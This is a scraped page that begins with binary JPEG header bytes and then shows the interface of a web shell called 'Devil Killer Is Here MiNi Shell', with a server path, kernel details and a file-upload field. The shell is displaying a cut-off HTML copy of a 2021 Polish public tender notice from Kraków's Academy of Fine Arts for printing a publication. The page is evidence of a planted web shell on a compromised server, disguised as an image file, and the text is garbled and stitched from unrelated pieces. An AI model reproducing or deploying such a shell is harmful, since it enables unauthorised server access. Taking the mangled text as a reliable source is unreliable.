JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211102/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211102/0025380501-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Druk i dostawa publikacji „Podniebne Ogrody” dla Wydziału Grafiki Akademii Sztuk Pięknych im. Jana Matejki w Krakowie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Akademia Sztuk Pięknych im. Jana Matejki w Krakowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">NIP 6750007570</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Jana Matejki 13</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">31-157</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@asp.krakow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.asp.krakow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Druk i dostawa publikacji „Podniebne Ogrody” dla Wydziału Grafiki Akademii Sztuk Pięknych im. Jana Matejki w Krakowie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2f4bccc2-3b4d-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00253805</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000104/11/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.5 Druk publikacji: &#34;Wydział Konserwacji i Restauracji Dzieł Sztuki krakowskiej ASP: zarys dziejów na tle historii ochrony zabytków w Polsce&#34; oraz pracy naukowo badawczej - WG</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/asp_krakow <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Postępowanie prowadzone jest w<br/>języku polskim za pośrednictwem Platformy Zakupowej pod adresem:<br/>https://platformazakupowa.pl/pn/asp_krakow/proceedings<br/>2. W przedmiotowym postępowaniu komunikacja między Zamawiającym a Wykonawcami odbywa się<br/>przy użyciu platformy zakupowej do obsługi postępowań o zamówienia publiczne:<br/>https://platformazakupowa.pl/pn/asp_krakow - w formie komunikacji elektronicznej.<br/>3. W sytuacjach awaryjnych np. w przypadku nie działania platformy zakupowej, dopuszcza się<br/>komunikację między Wykonawcami a Zamawiającym w zakresie składania wszelkich oświadczeń,<br/>wniosków, zawiadomień oraz informacji (nie dot. składania ofert z załącznikami i wniosków o<br/>dopuszczenie do udziału w postępowaniu) za pomocą poczty elektronicznej, na adres Zamawiającego:<br/>e-mail: zp@asp.krakow.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.10.) Przyczyny odstąpienia od komunikacji elektronicznej: </h3> <p class="mb-0">zamawiający wymaga przedstawienia modelu fizycznego, modelu w skali lub próbki, których nie można przekazać przy użyciu środków komunikacji elektronicznej (art. 65 ust. 1 pkt 4 ustawy)</p> <h3 class="mb-0">3.11.) Sposób nieelektronicznego składania ofert, wniosków, oświadczeń oraz innych dokumentów: <span class="normal">Zamawiający, działając zgodnie z zapisami art. 65 ust. 1 pkt 4) ustawy Pzp, odstępuje<br/>od wymogu użycia środków komunikacji elektronicznej w części dotyczącej złożenia próbki wymaganej<br/>do oceny w kryterium jakości, bowiem Zamawiający wymaga złożenia próbki w postaci drukowanej<br/>książki/publikacji, której nie można przekazać przy użyciu środków komunikacji elektronicznej.3.<br/>Złożenie próbki do oferty odbywa się za pośrednictwem operatora pocztowego w rozumieniu ustawy z<br/>dnia 23 listopada 2012 – Prawo pocztowe (tekst jednolity Dz.U. z 2020 poz. 1041 ze zmianami),<br/>osobiście lub za pośrednictwem posłańca.<br/>Próbka winna być dostarczona pod adres Zamawiającego: Akademia Sztuk Pięknych im. Jana Matejki<br/>w Krakowie, 31-157 Kraków, Plac Matejki 13 – Kancelaria Uczelni – I piętro pokój 104. Próbkę należy<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Usługi<br/>złożyć zgodnie z wymaganiami, które podano w rozdziale VIII niniejszej SWZ oraz w trwale<br/>zamkniętym opakowaniu/kopercie, gwarantującym/-ej nienaruszenie do dnia otwarcia. Na opakowaniu<br/>należy umieścić informację wg wzoru:<br/>Nazwa (firma) Wykonawcy dokładny adres Wykonawcy adres do korespondencji, kontaktowy numer<br/>telefonu<br/>Akademia Sztuk Pięknych im. Jana Matejki w Krakowie<br/>31-157 Kraków, Plac Jana Matejki 13<br/>Próbka załączana do oferty<br/>w postępowaniu pod nazwą: Druk i dostawa publikacji „Podniebne Ogrody” dla Wydziału Grafiki Akademii Sztuk Pięknych im. Jana Matejki w Krakowie – numer referencyjny BZP-3942-53/2021<br/><br/>Nie otwierać przed dniem 10 listopada 2021 roku - godziną 13:00*<br/><br/>*w przypadku dokonania przez Zamawiającego zmiany terminu składania ofert należy wpisać aktualny terminW przypadku nieprawidłowego oznaczenia i zabezpieczenia próbki Zamawiający nie bierze odpowiedzialności za złe skierowanie przesyłki i jej nieterminowe dostarczenie jak i przedterminowe otwarcie.</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Akademia Sztuk Pięknych im. Jana Matejki w Krakowie z<br/>siedzibą przy Placu Matejki 13, 31-157 Kraków (dalej „ASP w Krakowie”) przetwarza dane zawarte w<br/>ofertach albo wnioskach o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia<br/>publicznego, w wymaganych dokumentach, oświadczeniach, dane znajdujące się w publicznie<br/>dostępnych rejestrach (Krajowy Rejestr Sądowy, Centralna Ewidencja i Informacja o Działalności<br/>Gospodarczej RP, Krajowy Rejestr Karny) w celu prowadzenia postępowań o udzielenie<br/>zamówienia publicznego na podstawie przepisów ustawy z dnia 11 września 2019r. Prawo zamówień<br/>Publicznych (t.j. Dz.U. z 2021 r. poz. 1129). Wśród tych informacji mogą pojawiać się dane, które na<br/>gruncie Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/ 679 - z dnia 27 kwietnia 2016 r. -<br/>w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w<br/>sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/ 46/ WE (ogólne<br/>rozporządzenie o ochronie danych) (europa.eu) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”<br/>lub „Ogólne Rozporządzenie”, mają charakter danych osobowych.2. Zgodnie z art. 13 ust. 1 i 2<br/>Ogólnego Rozporządzenia, wszystkie osoby, które ubiegają się o udzielenie zamówienia / złożyły<br/>ofertę, Zamawiający informuje, że: Administratorem Danych jest Akademia Sztuk Pięknych im. Jana<br/>Matejki w Krakowie z siedzibą przy Placu Matejki 13, 31-157Kraków, NIP: 675-00-07-570 REGON:<br/>000275783. Pana/Pani dane osobowe są przetwarzane na podstawie art. 6 ust.1 lit. c RODO, tj.<br/>przetwarzanie jest niezbędne do wypełniania obowiązku prawnego ciążącego na Administratorze. Cel<br/>przetwarzania danych osobowych jest związany z prowadzeniem postępowania i realizacją umowy<br/>zawieranej w wyniku postępowania o udzielenie zamówienia publicznego, znak postępowania:<br/>BZP3942-53/2021, 4) Pani/Pana dane osobowe przetwarzane będą także w celu realizacji obowiązku<br/>prowadzenia ewidencji korespondencji i archiwizacji dokumentacji zgodnie z ustawą z dnia 14 lipca<br/>1983r. o narodowym zasobie archiwalnym i archiwach (Dz. U. z 2020 r. poz. 164). Pana/Pani dane<br/>będą przechowywane przez okres 5 lat liczony od dnia 1 stycznia roku następującego po roku, w<br/>którym zakończone zostało postępowanie o udzielenie zamówienia publicznego, za wyjątkiem umów,<br/>które będą przechowywane przez okres lat 10. 5)Pani/Pana dane pozyskane w związku z<br/>postępowaniem o udzielenie zamówienia publicznego przekazywane będą członkom komisji<br/>przetargowych i upoważnionym pracownikom ASP w Krakowie jak również wszystkim<br/>zainteresowanym podmiotom i osobom, gdyż co do zasady postępowanie o udzielenie zamówienia<br/>publicznego jest jawne. Ograniczenie dostępu do Pani/Pana danych, o których mowa wyżej może wystąpić jedynie w szczególnych przypadkach, jeśli jest to uzasadnione ochroną prywatności, zgodnie<br/>z art. 18 ust 5 pkt 1<br/>i 2 ustawy Pzp. Pani/Pana dane osobowe mogą być udostępniane innym osobom lub podmiotom jeżeli<br/>obowiązek taki będzie wynikać z przepisów prawa. Do Pani/Pana danych mogą też mieć dostęp<br/>podmioty przetwarzające dane w naszym imieniu, np. podmioty świadczące pomoc prawną, usługi<br/>informatyczne, jak również inni administratorzy danych osobowych przetwarzający dane we własnym<br/>imieniu, np. podmioty prowadzące działalność pocztową lub kurierską. Zgodnie z RODO przysługuje<br/>Pani/Panu: a) prawo dostępu do swoich danych oraz otrzymania ich kopii; b) prawo do sprostowania<br/>(poprawiania) swoich danych; c) prawo do usunięcia danych osobowych, w sytuacji, gdy przetwarzanie<br/>danych nie następuje w celu wywiązania się z obowiązku wynikającego z przepisu prawa, d) prawo do<br/>ograniczenia przetwarzania danych, przy czym przepisy odrębne mogą wyłączyć możliwość<br/>skorzystania z tego prawa. Szczegółowe obowiązki informacyjne wynikające z rozporządzenia<br/>Parlamentu Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016r. zostały wskazane w Specyfikacji Warunków Zamówienia - rozdział XXV</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">W postępowaniu o udzielenie zamówienia zgłoszenie<br/>żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza<br/>przetwarzania danych osobowych do czasu zakończenia tego postępowania</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BZP-3942-53/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest usługa pn.: Druk i dostawa publikacji „Podniebne Ogrody” dla Wydziału Grafiki Akademii Sztuk Pięknych im. Jana Matejki w Krakowie <br/>2.	Publikacja jest realizowana w ramach zadania badawczego nr 443 „Pantografia. Wykorzystywanie grafiki wektorowej w tworzeniu obrazu na matrycy wklęsłodrukowej” – kierownik zadania badawczego – prof. dr hab. Krzysztof Tomalski<br/>3.	Druk w.w. publikacji będzie realizowany na materiałach własnych Wykonawcy.<br/>4.	Przedmiot zamówienia obejmuje następujący zakres: <br/>1)	niezbędne czynności przygotowawcze, <br/>2)	druk i oprawę publikacji zgodnie z parametrami wskazanymi przez Zamawiającego w załączniku nr 1 do niniejszej SWZ – Opis przedmiotu zamówienia (OPZ), <br/>3)	dostawę nakładu rozumianą jako transport wydrukowanych książek (wraz z wniesieniem we wskazane miejsca w budynku) do siedziby Wydziału Grafiki Akademii Sztuk Pięknych im. Jana Matejki, 31-121 Kraków, ul. Humberta 3. <br/>5.	Wykonawca musi zaoferować przedmiot zamówienia zgodny z wymogami Zamawiającego określonymi w SWZ i objąć ofertą cały zakres przedmiotu zamówienia. Oferty nie zawierające pełnego zakresu przedmiotu zamówienia określonego w SWZ, w tym załączniku nr 1 - OPZ, bądź nie spełniające wymaganego minimalnego poziomu jakości, zostaną odrzucone.<br/>6.	Odbiór wydrukowanego nakładu książki objętej zamówieniem, będzie się odbywał w momencie jego wydania upoważnionemu do odbioru pracownikowi Zamawiającego i zostanie potwierdzony jego podpisem na protokole odbioru. <br/> Podpisanie protokołu odbioru bez zastrzeżeń, nie oznacza potwierdzenia przez Zamawiającego braku wad fizycznych i prawnych przedmiotu zamówienia.<br/>7. Szczegółowe warunki dotyczące realizacji zamówienia zostały określone w załączniku nr 3 do niniejszej SWZ – Projektowane postanowienia umowy.<br/>8. Kody ze Wspólnego Słownika Zamówień CPV:<br/> CPV 79823000-9 – usługi drukowania i dostawy<br/>9. Zamawiający informuje, iż nie dokonał podziału zamówienia na części w niniejszym postępowaniu bowiem przedmiot zamówienia (druk nakładu jednej publikacji) w tym postepowaniu stanowi integralną całość i nie da się go podzielić na odrębne zamówienia. Jest to jednak zamówienie udzielane w częściach, a przedmiotem odrębnych postępowań o udzielenie zamówienia są kolejne publikacje wydawane przez ASP. Brak podziału na części w postępowaniu nie wpływa na konkurencję. Zamówienie jest o wartości nieprzekraczającej progów UE i z dotychczasowych doświadczeń Zamawiającego wynika, iż o podobne zamówienia ubiegają się wyłącznie małe i średnie przedsiębiorstwa, tak więc zakres zamówienia jest dostosowany do potrzeb sektora MŚP bez konieczności dalszego rozdrabniania zakresu zamówienia.<br/> <br/> Wobec powyższego Zamawiający nie dopuszcza składania ofert częściowych.<br/><br/>10. Ze względu na specyfikę przedmiotu zamówienia, w przypadku podania przez Zamawiającego w SWZ, bądź załącznikach do SWZ, nazw materiałów lub znaków towarowych Zamawiający dopuszcza zastosowanie materiałów równoważnych, jednak o parametrach techniczno - jakościowych nie gorszych niż wskazane lub stanowiące dokładne odpowiedniki materiałów wymienionych w specyfikacji druku - opisie przedmiotu zamówienia, zawartym w Załączniku nr 1 do SWZ. (jeśli dotyczy) Wykonawca oferując materiał równoważny do opisanego w specyfikacji jest zobowiązany zachować równoważność w zakresie parametrów użytkowych i jakościowych, które muszą być na poziomie nie niższym od parametrów wskazanego przez Zamawiającego w załączniku nr 1 do SWZ materiału (papieru). <br/> W przypadku zaoferowania materiałów równoważnych, obowiązkiem Wykonawcy jest udowodnienie równoważności. W przypadku wątpliwości związanych z równoważnością materiałów Zamawiający będzie mógł poprosić o dodatkowe wyjaśnienia do Wykonawcy i/lub niezależnych jednostek badawczych mogących potwierdzić spełnienie wymagań. <br/>11. Podwykonawcy<br/> 1) Wykonawca może powierzyć wykonanie części zamówienia podwykonawcom. <br/> 2) Zamawiający nie korzysta z przewidzianego w art. 121 Ustawy uprawnienia i nie zastrzega obowiązku osobistego wykonania przez Wykonawcę kluczowych zadań<br/> 3) W przypadku powierzenia części zamówienia podwykonawcy, Zamawiający wymaga, aby Wykonawca wskazał w ofercie części zamówienia, których wykonanie zamierza powierzyć podwykonawcom oraz podał (o ile są mu wiadome na tym etapie) nazwy (firmy) tych podwykonawców (zgodnie z art. 462 ust. 2 ustawy Pzp). <br/> 4) Brak wskazania w ofercie, zamiaru powierzenia wykonania części zamówienia podwykonawcom będzie uznany jako deklaracja samodzielnej realizacji zamówienia.<br/> 5) Powierzenie wykonania zamówienia podwykonawcom nie zwalnia Wykonawcy z odpowiedzialności za należyte wykonanie tego zamówienia. <br/>12. Zgodnie z art. 95 ustawy Pzp Zamawiający wymaga, zatrudnienia przez Wykonawcę bądź Podwykonawcę, na podstawie stosunku pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r.- Kodeks pracy (tekst jednolity Dz.U. z 2020r., poz. 1320 ze zmianami), osób wykonujących czynności w trakcie realizacji zamówienia: obsługa maszyn drukujących. Zamawiający informuje, że zgodnie z art. 22 § 1(2) Kodeksu pracy: „nie jest dopuszczalne zastąpienie umowy o pracę umową cywilnoprawną przy zachowaniu warunków wykonywania pracy”. Oznacza to, że jeżeli praca jest wykonywana w miejscu i czasie wskazanym przez pracodawcę oraz pod jego kierownictwem, to należy stosować umowę o pracę. Postawienie warunku zatrudnienia personelu na podstawie umowy o pracę przez Zamawiającego jest uzasadnione, ponieważ przedmiotem niniejszego zamówienia są czynności, których wykonywanie odpowiada warunkom wykonywania pracy w rozumieniu art. 22 § 1 Kodeksu pracy. Uwaga: Powyższy wymóg nie dotyczy składających ofertę: osób fizycznych prowadzących działalność gospodarczą, które zobowiążą się do osobistego świadczenia usług oraz wspólników spółek osobowych, którzy zobowiążą się do osobistego świadczenia usług na rzecz spółki.<br/>13. Sposób dokumentowania zatrudniania na umowę o pracę przez Wykonawcę (Podwykonawcę) oraz sposoby weryfikacji, w tym zakresie przez Zamawiającego, jak również sankcje z tytułu niespełnienia wymogów w zakresie zatrudnienia na umowę o pracę, szczegółowo uregulowano w załączniku nr 3 do niniejszej SWZ – Projektowane postanowienia umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79823000-9 - Usługi drukowania i dostawy</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">28 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Jakość wykonania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Oświadczenia składane obligatoryjnie wraz z ofertą, w tym oświadczenie z art. 125 ust. 1 ustawy<br/>Pzp:<br/>1) W celu potwierdzenia spełniania warunków udziału w postępowaniu (jeśli dotyczy) oraz<br/>potwierdzenia braku podstaw do wykluczenia, z przesłanek z art. 108 ust. 1 oraz art. 109 ust.1 pkt 4, 5<br/>i 7 ustawy PZP - wskazanych przez Zamawiającego w rozdziale VI ust. 1 i 2 SWZ, Wykonawca załącza<br/>do oferty, aktualne na dzień składania ofert oświadczenie, o którym mowa w art.125 ust.1 ustawy Pzp,<br/>sporządzone na podstawie załącznika nr 4 do SWZ.<br/>2) Podmiotowe środki dowodowe - dokumenty i oświadczenia, które Wykonawca będzie zobowiązany<br/>złożyć na wezwanie Zamawiającego - dotyczy wykonawcy, którego oferta została najwyżej oceniona:<br/>Zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia<br/>następujących podmiotowych środków dowodowych – nie dotyczy</span> </h3> <h3 class="mb-0">5.8.) 